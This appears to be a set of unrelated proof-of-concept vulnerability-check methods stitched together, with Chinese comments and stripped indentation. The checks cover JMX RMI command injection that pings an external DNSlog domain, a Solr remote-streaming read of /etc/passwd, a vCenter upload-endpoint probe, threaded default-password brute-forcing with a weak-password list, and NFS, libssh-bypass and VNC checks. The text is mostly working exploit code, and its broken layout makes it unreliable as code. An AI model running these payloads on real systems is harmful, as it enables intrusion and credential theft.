def _verify(self):
result = {}
vul_url = self.url
target_url = vul_url
host, port = url2ip(target_url, True)
#payload = "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
payload = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)
#payload = "id & cmd.exe /c echo '{0}'".format(self.BANNER)
command = "java -jar ./data/jmxrmi_1.7.jar {0} {1} {2}".format(
host, port, payload)
print(command)
pro1 = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
output = pro1.stdout.read().decode()
#print(output)
time.sleep(2) # 休眠2s等待ceye生成记录
#if self.test_command(output):
if self.test_dnslog(self.CEYE_URL):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['Payload'] = payload
return self.save_output(result)
return self.save_output(result)
def _verify(self):
result = {}
vul_url = self.url
host, port = url2ip(vul_url, True)
logger.info("检查端口开放情况...")
# 端口都不开放就不浪费时间了
if not self.is_port_open(host, port):
logger.info("端口不开放! 退出!")
return
logger.info("端口开放... 继续")
target_url = "{0}/ui/vropspluginui/rest/services/uploadova".format(
vul_url)
try:
resp = req.get(target_url, verify=False)
except Exception as e:
print(e)
raise e
if resp.status_code == 405:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
logger.info(resp)
return self.save_output(result)
def _verify(self):
result={}
vul_url = self.url
host, port = url2ip(vul_url, True)
logger.info("检查端口开放情况...")
# 端口都不开放就不浪费时间了
if not self.is_port_open(host, port):
logger.info("端口不开放! 退出!")
return
logger.info("端口开放... 继续")
url_cores = vul_url + "/solr/admin/cores?wt=json"
payload = { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":"true"}}
payload2= 'stream.url=file:///etc/passwd'
flag = 'root:x:0:0' # /etc/passwd的标志
core_names = self.get_core_names(url_cores)
logger.info(core_names)
# 对每个core都发送一次请求
for core_name in core_names:
logger.info("当前core_name: " + core_name)
config_url = '{0}/solr/{1}/config'.format(self.url, core_name)
stream_url = '{0}/solr/{1}/debug/dump?param=ContentStreams'.format(self.url, core_name)
target_url = config_url
resp = None
try:
req.post(config_url, json=payload, timeout=5)
#resp = req.post(stream_url, data=payload2,timeout=5)
resp = req.post(stream_url, data={'stream.url': 'file:///etc/passwd'}, timeout=5)
except Exception as e:
logger.error(e)
#continue
logger.info(resp.status_code)
if resp.status_code == 404:
logger.info('Not Found!')
elif flag in resp.text:
file_content = resp.json()['streams'][0]['stream']
logger.info(file_content)
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['core'] = core_name
result['VerifyInfo']['Payload'] = payload2
result['VerifyInfo']['Response'] = file_content
return self.save_output(result)
return self.save_output(result)
def _verify(self):
result = {}
vul_url = self.url
target_url = vul_url
host, port = url2ip(target_url, True)
# 包含了空用户名/空密码的情况。这时候任何用户名密码都可以登录成功
usernames = ['admin', 'test', '']
passwords = [
'123456', 'admin', 'root', 'password', '123123', '123', '1', '',
'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
'123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou',
'000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123',
'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd',
'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t',
'system', '111111'
]
try:
self.flag = False # 初始化
self._username = ''
self._password = ''
threads = []
for username in usernames:
for password in passwords:
_thread = Thread(target=self.validate,
args=(host, port, username, password))
_thread.start()
threads.append(_thread)
# 等待所有线程完成
for t in threads:
t.join()
#flag = self.validate(host, port, "cqq", "cqq")
#print(flag)
if self.flag:
print(self._username)
print(self._password)
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except Exception as e:
print(e)
return self.save_output(result)
def _verify(self):
result = {}
vul_url = self.url
target_url = vul_url
# 传入True参数,得到host和port,参考:https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
host, port = url2ip(target_url, True)
IP_cn = "https://ip.cn"
# 将http和https的代理都设置为疑似存在
proxies = {'http': vul_url, 'https': vul_url}
# 包含了空用户名/空密码的情况。这时候任何用户名密码都可以登录成功
usernames = ['admin', 'test', '']
passwords = [
'123456', 'admin', 'root', 'password', '123123', '123', '1', '',
'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
'123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou',
'000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123',
'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd',
'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t',
'system', '111111'
]
try:
self.flag = False # 初始化
threads = []
for username in usernames:
for password in passwords:
_thread = Thread(target=self.validate,
args=(host, port, username, password))
_thread.start()
threads.append(_thread)
# 等待所有线程完成
for t in threads:
t.join()
# 状态码为200,则认证已通过HTTP访问目标站点成功
if self.flag:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except Exception as e:
print(e)
return self.save_output(result)
def _verify(self):
result = {}
vul_url = self.url
target_url = vul_url
# 传入True参数,得到host和port,参考:https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
host, port = url2ip(target_url, True)
socket.setdefaulttimeout(5) # 默认timeout时间
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
# NFS NULL Call
NFS_NULL_Call = b'8000002831ec45220000000000000002000186a3000000040000000000000000000000000000000000000000'
bNFS_NULL_Call = bytes.fromhex(NFS_NULL_Call.decode())
#NFS_NULL_Call2 = base64.b64decode('gAAAKDHsRSIAAAAAAAAAAgABhqMAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA=')
# 发送请求
#sock.send(NFS_NULL_Call2)
sock.send(bNFS_NULL_Call)
# 接收响应
hello = sock.recv(1024)
# NFS NULL Reply
NFS_NULL_Reply = binascii.b2a_hex(hello)
NFS_XID = NFS_NULL_Reply[8:16]
print(NFS_XID)
print("[*] NFS NULL Reply: {0}".format(NFS_NULL_Reply))
# 如果响应内容中有"31ec4522"(这个是XID,是请求中带的,如果响应中有则认为存在NFS协议)则认为存在漏洞
if NFS_XID.decode() == '31ec4522':
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except socket.error as msg:
print(
'[*] Could not connect to the target NFS service. Error code: '
+ str(msg[0]) + ' , Error message : ' + msg[1])
traceback.print_stack(msg)
def _verify(self):
result = {}
pr = urlparse(self.url)
host = url2ip(self.url)
port = pr.port if pr.port else 22
if password_auth_bypass_test(host, port):
result['VerifyInfo'] = {}
result['VerifyInfo']['Target'] = '{0}:{1}'.format(host, port)
return self.parse_attack(result)
if fake_key_bypass_test(host, port):
result['VerifyInfo'] = {}
result['VerifyInfo']['Target'] = '{0}:{1}'.format(host, port)
return self.parse_attack(result)
def _verify(self):
result = {}
vul_url = self.url
target_url = vul_url
# 传入True参数,得到host和port,参考:https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
host, port = url2ip(target_url, True)
try:
'''
socket.setdefaulttimeout(5) # 默认timeout时间
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.connect((host, port))
hello = server.recv(12)
print("[*] Hello From Server: {0}".format(hello))
# 如果响应内容中有"RFB", 比如"RFB 003.008"(版本号),则认为是VNC服务
if "RFB 003.008" in str(hello):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
'''
if self.crack(host, port):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except socket.error as msg:
print(
'[*] Could not connect to the target VNC service. Error code: '
+ str(msg[0]) + ' , Error message : ' + msg[1])
traceback.print_stack(msg)